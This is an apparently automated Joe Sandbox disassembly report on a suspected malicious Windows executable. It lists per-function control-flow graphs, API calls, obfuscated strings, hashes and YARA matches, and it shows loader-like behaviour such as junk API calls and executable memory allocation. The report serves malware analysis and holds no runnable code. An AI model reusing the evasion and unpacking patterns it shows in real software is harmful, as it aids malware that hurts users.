                                                                                                                                                    control_flow_graph 0 4ae482-4ae49d call 4115c0 3 4ae4a6-4ae4ad 0->3 4 4ae4af-4ae4b9 3->4 5 4ae506-4ae50a 3->5 7 4ae4bb-4ae4c9 ChangeTimerQueueTimer 4->7 8 4ae4cf-4ae4dc GetLastError 4->8 6 4ae513-4ae51a 5->6 9 4ae51c-4ae523 6->9 10 4ae531-4ae538 6->10 7->8 11 4ae4de-4ae4e5 8->11 12 4ae504 8->12 14 4ae52f 9->14 15 4ae525-4ae52a 9->15 16 4ae53e-4ae5b8 GetAtomNameA call 40e5f0 SetDefaultCommConfigA CopyFileExW FreeEnvironmentStringsW GetModuleHandleA EnumDateFormatsExW 10->16 17 4ae601-4ae60b 10->17 18 4ae502 11->18 19 4ae4e7-4ae4fc GetCompressedFileSizeA OpenFile 11->19 12->3 14->6 15->14 29 4ae5ba-4ae5c1 DeleteCriticalSection 16->29 30 4ae5c7-4ae5ce 16->30 20 4ae79d-4ae7a9 call 4ae12b 17->20 21 4ae611-4ae629 17->21 18->5 19->18 35 4ae7b8-4ae7c4 20->35 24 4ae62b-4ae645 FreeLibraryAndExitThread SetConsoleTitleA LocalFree 21->24 25 4ae64f-4ae79c GetConsoleAliasesLengthW DnsHostnameToComputerNameW CompareStringA IsProcessInJob GetTempFileNameA MoveFileExA OpenWaitableTimerW CompareStringA GetLongPathNameW HeapSize call 401458 call 401375 call 401458 call 40151e call 40e5f0 call 4ae32b call 401458 call 401000 call 40171e 21->25 24->25 25->20 29->30 33 4ae5d8-4ae600 call 401145 call 40100b call 4017a9 30->33 34 4ae5d0-4ae5d2 LoadLibraryW 30->34 33->17 34->33 38 4ae81e-4ae823 call 4ae1ed call 4ae140 35->38 39 4ae7c6-4ae801 35->39 53 4ae828-4ae83a call 4ae3d2 38->53 40 4ae81c 39->40 41 4ae803-4ae816 BuildCommDCBW VirtualUnlock 39->41 40->35 41->40 61 4ae849-4ae853 53->61 63 4ae872-4ae879 61->63 64 4ae855-4ae85f 61->64 68 4ae888-4ae892 63->68 66 4ae870 64->66 67 4ae861-4ae86b 64->67 66->61 67->66 69 4ae8d9 68->69 70 4ae894-4ae89e 68->70 69->69 73 4ae8a8-4ae8bc 70->73 74 4ae8a0-4ae8a2 GetConsoleDisplayMode 70->74 76 4ae8be-4ae8d1 SetFileAttributesA OpenWaitableTimerW 73->76 77 4ae8d7 73->77 74->73 76->77 77->68
                                                                                                                                                    APIs
                                                                                                                                                    • ChangeTimerQueueTimer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004AE4C9
                                                                                                                                                      • Part of subcall function 004AE12B: GlobalAlloc.KERNELBASE(00000000,004AE7A2), ref: 004AE133
                                                                                                                                                    • GetLastError.KERNEL32 ref: 004AE4CF
                                                                                                                                                    • GetCompressedFileSizeA.KERNEL32(raf,?), ref: 004AE4F0
                                                                                                                                                    • OpenFile.KERNEL32(00000000,00000000,00000000), ref: 004AE4FC
                                                                                                                                                    • GetAtomNameA.KERNEL32(00000000,?,00000000), ref: 004AE549
                                                                                                                                                    • _memset.LIBCMT ref: 004AE561
                                                                                                                                                    • SetDefaultCommConfigA.KERNEL32(fahubarocuvuvejegovimisiwu,?,00000000), ref: 004AE577
                                                                                                                                                    • CopyFileExW.KERNEL32(gebacalace,gijarudomuki,00000000,00000000,00000000,00000000), ref: 004AE58F
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004AE597
                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 004AE59F
                                                                                                                                                    • EnumDateFormatsExW.KERNEL32(00000000,00000000,00000000), ref: 004AE5AB
                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 004AE5C1
                                                                                                                                                    • LoadLibraryW.KERNEL32(00000000), ref: 004AE5D2
                                                                                                                                                    • _sprintf.LIBCMT ref: 004AE5E2
                                                                                                                                                    • FreeLibraryAndExitThread.KERNEL32(00000000,00000000), ref: 004AE62F
                                                                                                                                                    • SetConsoleTitleA.KERNEL32(00000000), ref: 004AE637
                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 004AE63F
                                                                                                                                                    • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 004AE651
                                                                                                                                                    • DnsHostnameToComputerNameW.KERNEL32(lumejasurinisomekep,?,?), ref: 004AE66A
                                                                                                                                                    • CompareStringA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AE67C
                                                                                                                                                    • IsProcessInJob.KERNEL32(00000000,00000000,00000000), ref: 004AE688
                                                                                                                                                    • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?), ref: 004AE69B
                                                                                                                                                    • MoveFileExA.KERNEL32(00000000,00000000,00000000), ref: 004AE6A7
                                                                                                                                                    • OpenWaitableTimerW.KERNEL32(00000000,00000000,wevisodomasamonacocidazegoluhocirakuduciwekunasigilamepidepiyupiwowazovopejibokewizi), ref: 004AE6B6
                                                                                                                                                    • CompareStringA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AE6C8
                                                                                                                                                    • GetLongPathNameW.KERNEL32(zituvehaziyepilegeyehezesekemidelapuzayuzajebivironemus,?,00000000), ref: 004AE6DC
                                                                                                                                                    • HeapSize.KERNEL32(00000000,00000000,00000000), ref: 004AE6E8
                                                                                                                                                    • _calloc.LIBCMT ref: 004AE6F2
                                                                                                                                                    • __vswprintf.LIBCMT ref: 004AE708
                                                                                                                                                    • _calloc.LIBCMT ref: 004AE714
                                                                                                                                                    • _wscanf.LIBCMT ref: 004AE720
                                                                                                                                                    • _memset.LIBCMT ref: 004AE73F
                                                                                                                                                    • __vsnprintf.LIBCMT ref: 004AE76A
                                                                                                                                                    • _calloc.LIBCMT ref: 004AE776
                                                                                                                                                    • BuildCommDCBW.KERNEL32(00000000,?), ref: 004AE80C
                                                                                                                                                    • VirtualUnlock.KERNEL32(00000000,00000000), ref: 004AE816
                                                                                                                                                    • GetConsoleDisplayMode.KERNEL32(00000000), ref: 004AE8A2
                                                                                                                                                    • SetFileAttributesA.KERNEL32(sifaletipizeciyozuxisonejozagijiweluwipicuxogiraheroriluvejosatijedarovawujerorigikedozotawawoxukeyukejuviw,00000000), ref: 004AE8C5
                                                                                                                                                    • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 004AE8D1
                                                                                                                                                    Strings
                                                                                                                                                    • lumejasurinisomekep, xrefs: 004AE665
                                                                                                                                                    • gebacalace, xrefs: 004AE58A
                                                                                                                                                    • raf, xrefs: 004AE4EB
                                                                                                                                                    • sifaletipizeciyozuxisonejozagijiweluwipicuxogiraheroriluvejosatijedarovawujerorigikedozotawawoxukeyukejuviw, xrefs: 004AE8C0
                                                                                                                                                    • gijarudomuki, xrefs: 004AE585
                                                                                                                                                    • wevisodomasamonacocidazegoluhocirakuduciwekunasigilamepidepiyupiwowazovopejibokewizi, xrefs: 004AE6AD
                                                                                                                                                    • 0 %f, xrefs: 004AE6FE
                                                                                                                                                    • tl_, xrefs: 004AE513
                                                                                                                                                    • zituvehaziyepilegeyehezesekemidelapuzayuzajebivironemus, xrefs: 004AE6D7
                                                                                                                                                    • 0 %s %d %f, xrefs: 004AE71B
                                                                                                                                                    • fahubarocuvuvejegovimisiwu, xrefs: 004AE572
                                                                                                                                                    • kernel32.dll, xrefs: 004AE5DD, 004AE703
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$NameTimer$ConsoleFreeOpen_calloc$CommCompareLibrarySizeStringWaitable_memset$AliasesAllocAtomAttributesBuildChangeCompressedComputerConfigCopyCriticalDateDefaultDeleteDisplayEnumEnvironmentErrorExitFormatsGlobalHandleHeapHostnameLastLengthLoadLocalLongModeModuleMovePathProcessQueueSectionStringsTempThreadTitleUnlockVirtual__vsnprintf__vswprintf_sprintf_wscanf
                                                                                                                                                    • String ID: 0 %f$0 %s %d %f$fahubarocuvuvejegovimisiwu$gebacalace$gijarudomuki$kernel32.dll$lumejasurinisomekep$raf$sifaletipizeciyozuxisonejozagijiweluwipicuxogiraheroriluvejosatijedarovawujerorigikedozotawawoxukeyukejuviw$tl_$wevisodomasamonacocidazegoluhocirakuduciwekunasigilamepidepiyupiwowazovopejibokewizi$zituvehaziyepilegeyehezesekemidelapuzayuzajebivironemus
                                                                                                                                                    • API String ID: 3588671428-3182146683
                                                                                                                                                    • Opcode ID: 822a960f7da8a4e3dace8776663c885a4bafc196431e93abf2faf77c30c19afb
                                                                                                                                                    • Instruction ID: 2d05831f116b6ff771836e775111b8e98a4eb86c3fde4474ddee8580e8ef98ae
                                                                                                                                                    • Opcode Fuzzy Hash: 822a960f7da8a4e3dace8776663c885a4bafc196431e93abf2faf77c30c19afb
                                                                                                                                                    • Instruction Fuzzy Hash: DFB1D730944304EFEB24BB91DC4AF9977B4FB15706F20017AF209AA1D1DBB859808FAD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02270420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 98 2270420-22704f8 100 22704ff-227053c CreateWindowExA 98->100 101 22704fa 98->101 103 2270540-2270558 PostMessageA 100->103 104 227053e 100->104 102 22705aa-22705ad 101->102 105 227055f-2270563 103->105 104->102 105->102 106 2270565-2270579 105->106 106->102 108 227057b-2270582 106->108 109 2270584-2270588 108->109 110 22705a8 108->110 109->110 111 227058a-2270591 109->111 110->105 111->110 112 2270593-2270597 call 2270110 111->112 114 227059c-22705a5 112->114 114->110
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02270533
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                    • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                    • API String ID: 716092398-2341455598
                                                                                                                                                    • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                    • Instruction ID: 7a747ec890602e8c5436fd01b143be3182b9193d1356ab521cd7574b5f750d64
                                                                                                                                                    • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                    • Instruction Fuzzy Hash: EF511870D08388DAEB11CBE8C849BDDBFB2AF11708F144058D5447F28AC3BA5658CBA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004AE140 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37librarymemoryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 115 4ae140-4ae146 116 4ae148-4ae14e 115->116 117 4ae1dd-4ae1e4 116->117 118 4ae154-4ae1d7 LoadLibraryA VirtualProtect 116->118 117->116 119 4ae1ea-4ae1ec 117->119 118->117
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004AE1BF
                                                                                                                                                    • VirtualProtect.KERNELBASE(00000040,?), ref: 004AE1D7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoadProtectVirtual
                                                                                                                                                    • String ID: $kernel32.dll
                                                                                                                                                    • API String ID: 3279857687-2116778257
                                                                                                                                                    • Opcode ID: 37a4147a33ba0d0e330dd567c5d964f66c79626c1e979386eaa1a1f4a5bd7be5
                                                                                                                                                    • Instruction ID: 5f606fa23596edf638ab64ecc60d625152bf3fb6cacbf3c2384848234705856b
                                                                                                                                                    • Opcode Fuzzy Hash: 37a4147a33ba0d0e330dd567c5d964f66c79626c1e979386eaa1a1f4a5bd7be5
                                                                                                                                                    • Instruction Fuzzy Hash: 56011B614087D8DFE722C728EC887497EB5D322708F8402BCD5805A2A2CFFA055987FD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 022705B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 120 22705b0-22705d5 121 22705dc-22705e0 120->121 122 22705e2-22705f5 GetFileAttributesA 121->122 123 227061e-2270621 121->123 124 22705f7-22705fe 122->124 125 2270613-227061c 122->125 124->125 126 2270600-227060b call 2270420 124->126 125->121 128 2270610 126->128 128->125
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 022705EC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID: apfHQ$o
                                                                                                                                                    • API String ID: 3188754299-2999369273
                                                                                                                                                    • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                    • Instruction ID: e33d3fbeed637e322119c10a8ebec72edc4e520470a7992dc499f72c0ed53470
                                                                                                                                                    • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                    • Instruction Fuzzy Hash: 91011E70C0825DEADB10DBD8C5583AEBFB5AF41308F148099C4092B241D7B69B58CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040B515 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 129 40b515-40b524 GetEnvironmentStringsW 130 40b526-40b529 129->130 131 40b52a-40b52d 129->131 132 40b53d-40b546 call 40dd16 131->132 133 40b52f-40b534 131->133 136 40b54b-40b550 132->136 133->133 134 40b536-40b53b 133->134 134->132 134->133 137 40b552-40b55e FreeEnvironmentStringsW 136->137 138 40b55f-40b56a call 410670 136->138 138->137
                                                                                                                                                    APIs
                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(00000000,00401C89), ref: 0040B518
                                                                                                                                                    • __malloc_crt.LIBCMT ref: 0040B546
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040B553
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 237123855-0
                                                                                                                                                    • Opcode ID: a179ea053f355425591d3604bae4074cdfaf5bbd45b248c1e9aed1462079b9fa
                                                                                                                                                    • Instruction ID: a20317ea7c653c825368ec33b4918dbdfb5682d714bf94f6b9f9c16c887033bf
                                                                                                                                                    • Opcode Fuzzy Hash: a179ea053f355425591d3604bae4074cdfaf5bbd45b248c1e9aed1462079b9fa
                                                                                                                                                    • Instruction Fuzzy Hash: 4AF082369152207BDA257B397C4847B1638EAC732E31144BBF452D3281F7384D8242ED
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004AE94A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 141 4ae94a-4ae95f 142 4ae961-4ae967 141->142 143 4ae978-4ae982 142->143 144 4ae969-4ae973 142->144 145 4ae984-4ae99b lstrcatA 143->145 146 4ae9a5-4ae9ac 143->146 144->143 145->146 146->142 147 4ae9ae call 4ae482 146->147 149 4ae9b3-4ae9ca call 401136 147->149
                                                                                                                                                    APIs
                                                                                                                                                    • lstrcatA.KERNEL32(?,wiludelocoxobexehatopizuseril godicatokofewiba dubojulisafojovufugelaregecer pivoselevir,00000000), ref: 004AE98E
                                                                                                                                                    Strings
                                                                                                                                                    • wiludelocoxobexehatopizuseril godicatokofewiba dubojulisafojovufugelaregecer pivoselevir, xrefs: 004AE984
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat
                                                                                                                                                    • String ID: wiludelocoxobexehatopizuseril godicatokofewiba dubojulisafojovufugelaregecer pivoselevir
                                                                                                                                                    • API String ID: 4038537762-3498426427
                                                                                                                                                    • Opcode ID: 81bc1d7b5178b9e043021b7ffe671285a32a06dcb8b0126b5e46dd569acd7c07
                                                                                                                                                    • Instruction ID: ef55aa3e88010da95652f866f3ef6f3cf4aae5e6565f041d771a9bcb7978981f
                                                                                                                                                    • Opcode Fuzzy Hash: 81bc1d7b5178b9e043021b7ffe671285a32a06dcb8b0126b5e46dd569acd7c07
                                                                                                                                                    • Instruction Fuzzy Hash: 32F0F6F2D003109BD720AF69DC4529677A8F759304F00473AA790E31B1E3788456CBCE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004AE1ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15libraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 152 4ae1ed-4ae24c LoadLibraryA
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNELBASE(kernel32.dll,004AE823), ref: 004AE246
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID: kernel32.dll
                                                                                                                                                    • API String ID: 1029625771-1793498882
                                                                                                                                                    • Opcode ID: 6e610d8d9b13a854e5f273cd0cf5a17e68fce6b8d63301bc8c3917fb6d229207
                                                                                                                                                    • Instruction ID: f522a79f35a7b6027a2100ee6d918d510761d10b203e5eaadbe0bee2182483c5
                                                                                                                                                    • Opcode Fuzzy Hash: 6e610d8d9b13a854e5f273cd0cf5a17e68fce6b8d63301bc8c3917fb6d229207
                                                                                                                                                    • Instruction Fuzzy Hash: 49F0DC1054C7C8CEE722C728A9D87153EB5D322748FD812AD81850A2A2CFFB0119D3FE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BED2 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 166 40bed2-40bef4 HeapCreate 167 40bef6-40bef7 166->167 168 40bef8-40bf01 166->168
                                                                                                                                                    APIs
                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040BEE7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 10892065-0
                                                                                                                                                    • Opcode ID: 53d2c214da6d41e4110ebde4187681810c5f8fd8b3d6f7ccea1ba3925f0022df
                                                                                                                                                    • Instruction ID: bd385264c0e40bfed3fad7fa7012941edca163f6456cee6c0c46be85baf8f4ae
                                                                                                                                                    • Opcode Fuzzy Hash: 53d2c214da6d41e4110ebde4187681810c5f8fd8b3d6f7ccea1ba3925f0022df
                                                                                                                                                    • Instruction Fuzzy Hash: 7FD05E72994309ABDB105F79AC08B623BDCD384399F004536B91CC6590FBB4D5409A88
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0210A485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 169 210a485-210a4bf call 210a798 172 210a4c1-210a4f4 VirtualAlloc call 210a512 169->172 173 210a50d 169->173 175 210a4f9-210a50b 172->175 173->173 175->173
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0210A4D6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229632028.000000000210A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0210A000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_210a000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                    • Instruction ID: 3b544052cf968e5d40625f41d68af983d61b1082ddfb64afec4294c5d6030bd9
                                                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                    • Instruction Fuzzy Hash: 1D113C79A40208EFDB01DF98C985E9DBBF5AF08350F0580A4FA489B361D371EA90DF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004AE128 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 179 4ae128-4ae13e GlobalAlloc
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,004AE7A2), ref: 004AE133
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
